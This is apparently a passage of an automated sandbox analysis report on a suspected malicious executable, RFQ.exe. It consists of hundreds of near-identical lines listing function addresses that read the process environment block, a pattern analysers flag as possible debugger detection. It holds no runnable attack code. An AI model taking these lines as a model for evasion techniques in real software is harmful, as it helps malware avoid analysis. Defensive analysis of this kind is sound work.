            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5E5E7 mov eax, dword ptr fs:[00000030h]5_2_01A5E5E7
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A325E0 mov eax, dword ptr fs:[00000030h]5_2_01A325E0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6C5ED mov eax, dword ptr fs:[00000030h]5_2_01A6C5ED
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6C5ED mov eax, dword ptr fs:[00000030h]5_2_01A6C5ED
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E5CF mov eax, dword ptr fs:[00000030h]5_2_01A6E5CF
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E5CF mov eax, dword ptr fs:[00000030h]5_2_01A6E5CF
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A365D0 mov eax, dword ptr fs:[00000030h]5_2_01A365D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6A5D0 mov eax, dword ptr fs:[00000030h]5_2_01A6A5D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6A5D0 mov eax, dword ptr fs:[00000030h]5_2_01A6A5D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40535 mov eax, dword ptr fs:[00000030h]5_2_01A40535
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40535 mov eax, dword ptr fs:[00000030h]5_2_01A40535
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40535 mov eax, dword ptr fs:[00000030h]5_2_01A40535
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40535 mov eax, dword ptr fs:[00000030h]5_2_01A40535
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40535 mov eax, dword ptr fs:[00000030h]5_2_01A40535
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40535 mov eax, dword ptr fs:[00000030h]5_2_01A40535
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5E53E mov eax, dword ptr fs:[00000030h]5_2_01A5E53E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5E53E mov eax, dword ptr fs:[00000030h]5_2_01A5E53E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5E53E mov eax, dword ptr fs:[00000030h]5_2_01A5E53E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5E53E mov eax, dword ptr fs:[00000030h]5_2_01A5E53E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5E53E mov eax, dword ptr fs:[00000030h]5_2_01A5E53E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC6500 mov eax, dword ptr fs:[00000030h]5_2_01AC6500
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B04500 mov eax, dword ptr fs:[00000030h]5_2_01B04500
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B04500 mov eax, dword ptr fs:[00000030h]5_2_01B04500
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B04500 mov eax, dword ptr fs:[00000030h]5_2_01B04500
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B04500 mov eax, dword ptr fs:[00000030h]5_2_01B04500
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B04500 mov eax, dword ptr fs:[00000030h]5_2_01B04500
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B04500 mov eax, dword ptr fs:[00000030h]5_2_01B04500
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B04500 mov eax, dword ptr fs:[00000030h]5_2_01B04500
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6656A mov eax, dword ptr fs:[00000030h]5_2_01A6656A
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6656A mov eax, dword ptr fs:[00000030h]5_2_01A6656A
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6656A mov eax, dword ptr fs:[00000030h]5_2_01A6656A
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A38550 mov eax, dword ptr fs:[00000030h]5_2_01A38550
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A38550 mov eax, dword ptr fs:[00000030h]5_2_01A38550
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A364AB mov eax, dword ptr fs:[00000030h]5_2_01A364AB
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A644B0 mov ecx, dword ptr fs:[00000030h]5_2_01A644B0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABA4B0 mov eax, dword ptr fs:[00000030h]5_2_01ABA4B0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AEA49A mov eax, dword ptr fs:[00000030h]5_2_01AEA49A
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A304E5 mov ecx, dword ptr fs:[00000030h]5_2_01A304E5
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2E420 mov eax, dword ptr fs:[00000030h]5_2_01A2E420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2E420 mov eax, dword ptr fs:[00000030h]5_2_01A2E420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2E420 mov eax, dword ptr fs:[00000030h]5_2_01A2E420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2C427 mov eax, dword ptr fs:[00000030h]5_2_01A2C427
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB6420 mov eax, dword ptr fs:[00000030h]5_2_01AB6420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB6420 mov eax, dword ptr fs:[00000030h]5_2_01AB6420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB6420 mov eax, dword ptr fs:[00000030h]5_2_01AB6420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB6420 mov eax, dword ptr fs:[00000030h]5_2_01AB6420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB6420 mov eax, dword ptr fs:[00000030h]5_2_01AB6420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB6420 mov eax, dword ptr fs:[00000030h]5_2_01AB6420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB6420 mov eax, dword ptr fs:[00000030h]5_2_01AB6420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6A430 mov eax, dword ptr fs:[00000030h]5_2_01A6A430
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A68402 mov eax, dword ptr fs:[00000030h]5_2_01A68402
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A68402 mov eax, dword ptr fs:[00000030h]5_2_01A68402
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A68402 mov eax, dword ptr fs:[00000030h]5_2_01A68402
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABC460 mov ecx, dword ptr fs:[00000030h]5_2_01ABC460
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5A470 mov eax, dword ptr fs:[00000030h]5_2_01A5A470
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5A470 mov eax, dword ptr fs:[00000030h]5_2_01A5A470
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5A470 mov eax, dword ptr fs:[00000030h]5_2_01A5A470
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E443 mov eax, dword ptr fs:[00000030h]5_2_01A6E443
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E443 mov eax, dword ptr fs:[00000030h]5_2_01A6E443
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E443 mov eax, dword ptr fs:[00000030h]5_2_01A6E443
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E443 mov eax, dword ptr fs:[00000030h]5_2_01A6E443
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E443 mov eax, dword ptr fs:[00000030h]5_2_01A6E443
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E443 mov eax, dword ptr fs:[00000030h]5_2_01A6E443
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E443 mov eax, dword ptr fs:[00000030h]5_2_01A6E443
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E443 mov eax, dword ptr fs:[00000030h]5_2_01A6E443
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AEA456 mov eax, dword ptr fs:[00000030h]5_2_01AEA456
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2645D mov eax, dword ptr fs:[00000030h]5_2_01A2645D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5245A mov eax, dword ptr fs:[00000030h]5_2_01A5245A
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A307AF mov eax, dword ptr fs:[00000030h]5_2_01A307AF
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE47A0 mov eax, dword ptr fs:[00000030h]5_2_01AE47A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD678E mov eax, dword ptr fs:[00000030h]5_2_01AD678E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A527ED mov eax, dword ptr fs:[00000030h]5_2_01A527ED
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A527ED mov eax, dword ptr fs:[00000030h]5_2_01A527ED
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A527ED mov eax, dword ptr fs:[00000030h]5_2_01A527ED
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABE7E1 mov eax, dword ptr fs:[00000030h]5_2_01ABE7E1
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A347FB mov eax, dword ptr fs:[00000030h]5_2_01A347FB
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A347FB mov eax, dword ptr fs:[00000030h]5_2_01A347FB
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3C7C0 mov eax, dword ptr fs:[00000030h]5_2_01A3C7C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB07C3 mov eax, dword ptr fs:[00000030h]5_2_01AB07C3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6C720 mov eax, dword ptr fs:[00000030h]5_2_01A6C720
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6C720 mov eax, dword ptr fs:[00000030h]5_2_01A6C720
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6273C mov eax, dword ptr fs:[00000030h]5_2_01A6273C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6273C mov ecx, dword ptr fs:[00000030h]5_2_01A6273C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6273C mov eax, dword ptr fs:[00000030h]5_2_01A6273C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAC730 mov eax, dword ptr fs:[00000030h]5_2_01AAC730
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6C700 mov eax, dword ptr fs:[00000030h]5_2_01A6C700
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A30710 mov eax, dword ptr fs:[00000030h]5_2_01A30710
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A60710 mov eax, dword ptr fs:[00000030h]5_2_01A60710
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A38770 mov eax, dword ptr fs:[00000030h]5_2_01A38770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6674D mov esi, dword ptr fs:[00000030h]5_2_01A6674D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6674D mov eax, dword ptr fs:[00000030h]5_2_01A6674D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6674D mov eax, dword ptr fs:[00000030h]5_2_01A6674D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A30750 mov eax, dword ptr fs:[00000030h]5_2_01A30750
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABE75D mov eax, dword ptr fs:[00000030h]5_2_01ABE75D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72750 mov eax, dword ptr fs:[00000030h]5_2_01A72750
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72750 mov eax, dword ptr fs:[00000030h]5_2_01A72750
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB4755 mov eax, dword ptr fs:[00000030h]5_2_01AB4755
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6C6A6 mov eax, dword ptr fs:[00000030h]5_2_01A6C6A6
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A666B0 mov eax, dword ptr fs:[00000030h]5_2_01A666B0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A34690 mov eax, dword ptr fs:[00000030h]5_2_01A34690
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A34690 mov eax, dword ptr fs:[00000030h]5_2_01A34690
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAE6F2 mov eax, dword ptr fs:[00000030h]5_2_01AAE6F2
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAE6F2 mov eax, dword ptr fs:[00000030h]5_2_01AAE6F2
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAE6F2 mov eax, dword ptr fs:[00000030h]5_2_01AAE6F2
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAE6F2 mov eax, dword ptr fs:[00000030h]5_2_01AAE6F2
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB06F1 mov eax, dword ptr fs:[00000030h]5_2_01AB06F1
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB06F1 mov eax, dword ptr fs:[00000030h]5_2_01AB06F1
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6A6C7 mov ebx, dword ptr fs:[00000030h]5_2_01A6A6C7
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6A6C7 mov eax, dword ptr fs:[00000030h]5_2_01A6A6C7
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4E627 mov eax, dword ptr fs:[00000030h]5_2_01A4E627
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A66620 mov eax, dword ptr fs:[00000030h]5_2_01A66620
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A68620 mov eax, dword ptr fs:[00000030h]5_2_01A68620
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3262C mov eax, dword ptr fs:[00000030h]5_2_01A3262C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAE609 mov eax, dword ptr fs:[00000030h]5_2_01AAE609
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4260B mov eax, dword ptr fs:[00000030h]5_2_01A4260B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4260B mov eax, dword ptr fs:[00000030h]5_2_01A4260B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4260B mov eax, dword ptr fs:[00000030h]5_2_01A4260B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4260B mov eax, dword ptr fs:[00000030h]5_2_01A4260B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4260B mov eax, dword ptr fs:[00000030h]5_2_01A4260B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4260B mov eax, dword ptr fs:[00000030h]5_2_01A4260B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4260B mov eax, dword ptr fs:[00000030h]5_2_01A4260B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72619 mov eax, dword ptr fs:[00000030h]5_2_01A72619
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF866E mov eax, dword ptr fs:[00000030h]5_2_01AF866E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF866E mov eax, dword ptr fs:[00000030h]5_2_01AF866E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6A660 mov eax, dword ptr fs:[00000030h]5_2_01A6A660
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6A660 mov eax, dword ptr fs:[00000030h]5_2_01A6A660
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A62674 mov eax, dword ptr fs:[00000030h]5_2_01A62674
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4C640 mov eax, dword ptr fs:[00000030h]5_2_01A4C640
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A309AD mov eax, dword ptr fs:[00000030h]5_2_01A309AD
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A309AD mov eax, dword ptr fs:[00000030h]5_2_01A309AD
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB89B3 mov esi, dword ptr fs:[00000030h]5_2_01AB89B3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB89B3 mov eax, dword ptr fs:[00000030h]5_2_01AB89B3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB89B3 mov eax, dword ptr fs:[00000030h]5_2_01AB89B3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABE9E0 mov eax, dword ptr fs:[00000030h]5_2_01ABE9E0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A629F9 mov eax, dword ptr fs:[00000030h]5_2_01A629F9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A629F9 mov eax, dword ptr fs:[00000030h]5_2_01A629F9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC69C0 mov eax, dword ptr fs:[00000030h]5_2_01AC69C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A9D0 mov eax, dword ptr fs:[00000030h]5_2_01A3A9D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A9D0 mov eax, dword ptr fs:[00000030h]5_2_01A3A9D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A9D0 mov eax, dword ptr fs:[00000030h]5_2_01A3A9D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A9D0 mov eax, dword ptr fs:[00000030h]5_2_01A3A9D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A9D0 mov eax, dword ptr fs:[00000030h]5_2_01A3A9D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A9D0 mov eax, dword ptr fs:[00000030h]5_2_01A3A9D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A649D0 mov eax, dword ptr fs:[00000030h]5_2_01A649D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AFA9D3 mov eax, dword ptr fs:[00000030h]5_2_01AFA9D3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB892A mov eax, dword ptr fs:[00000030h]5_2_01AB892A
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC892B mov eax, dword ptr fs:[00000030h]5_2_01AC892B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAE908 mov eax, dword ptr fs:[00000030h]5_2_01AAE908
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAE908 mov eax, dword ptr fs:[00000030h]5_2_01AAE908
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABC912 mov eax, dword ptr fs:[00000030h]5_2_01ABC912
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A28918 mov eax, dword ptr fs:[00000030h]5_2_01A28918
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A28918 mov eax, dword ptr fs:[00000030h]5_2_01A28918
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A56962 mov eax, dword ptr fs:[00000030h]5_2_01A56962
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A56962 mov eax, dword ptr fs:[00000030h]5_2_01A56962
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A56962 mov eax, dword ptr fs:[00000030h]5_2_01A56962
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A7096E mov eax, dword ptr fs:[00000030h]5_2_01A7096E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A7096E mov edx, dword ptr fs:[00000030h]5_2_01A7096E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A7096E mov eax, dword ptr fs:[00000030h]5_2_01A7096E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD4978 mov eax, dword ptr fs:[00000030h]5_2_01AD4978
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD4978 mov eax, dword ptr fs:[00000030h]5_2_01AD4978
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABC97C mov eax, dword ptr fs:[00000030h]5_2_01ABC97C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB0946 mov eax, dword ptr fs:[00000030h]5_2_01AB0946
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B04940 mov eax, dword ptr fs:[00000030h]5_2_01B04940
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A30887 mov eax, dword ptr fs:[00000030h]5_2_01A30887
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABC89D mov eax, dword ptr fs:[00000030h]5_2_01ABC89D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AFA8E4 mov eax, dword ptr fs:[00000030h]5_2_01AFA8E4
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6C8F9 mov eax, dword ptr fs:[00000030h]5_2_01A6C8F9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6C8F9 mov eax, dword ptr fs:[00000030h]5_2_01A6C8F9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5E8C0 mov eax, dword ptr fs:[00000030h]5_2_01A5E8C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B008C0 mov eax, dword ptr fs:[00000030h]5_2_01B008C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A52835 mov eax, dword ptr fs:[00000030h]5_2_01A52835
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A52835 mov eax, dword ptr fs:[00000030h]5_2_01A52835
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A52835 mov eax, dword ptr fs:[00000030h]5_2_01A52835
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A52835 mov ecx, dword ptr fs:[00000030h]5_2_01A52835
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A52835 mov eax, dword ptr fs:[00000030h]5_2_01A52835
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A52835 mov eax, dword ptr fs:[00000030h]5_2_01A52835
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6A830 mov eax, dword ptr fs:[00000030h]5_2_01A6A830
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD483A mov eax, dword ptr fs:[00000030h]5_2_01AD483A
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD483A mov eax, dword ptr fs:[00000030h]5_2_01AD483A
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABC810 mov eax, dword ptr fs:[00000030h]5_2_01ABC810
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABE872 mov eax, dword ptr fs:[00000030h]5_2_01ABE872
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABE872 mov eax, dword ptr fs:[00000030h]5_2_01ABE872
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC6870 mov eax, dword ptr fs:[00000030h]5_2_01AC6870
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC6870 mov eax, dword ptr fs:[00000030h]5_2_01AC6870
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A42840 mov ecx, dword ptr fs:[00000030h]5_2_01A42840
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A60854 mov eax, dword ptr fs:[00000030h]5_2_01A60854
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A34859 mov eax, dword ptr fs:[00000030h]5_2_01A34859
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A34859 mov eax, dword ptr fs:[00000030h]5_2_01A34859
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40BBE mov eax, dword ptr fs:[00000030h]5_2_01A40BBE
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40BBE mov eax, dword ptr fs:[00000030h]5_2_01A40BBE
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE4BB0 mov eax, dword ptr fs:[00000030h]5_2_01AE4BB0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE4BB0 mov eax, dword ptr fs:[00000030h]5_2_01AE4BB0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A38BF0 mov eax, dword ptr fs:[00000030h]5_2_01A38BF0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A38BF0 mov eax, dword ptr fs:[00000030h]5_2_01A38BF0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A38BF0 mov eax, dword ptr fs:[00000030h]5_2_01A38BF0
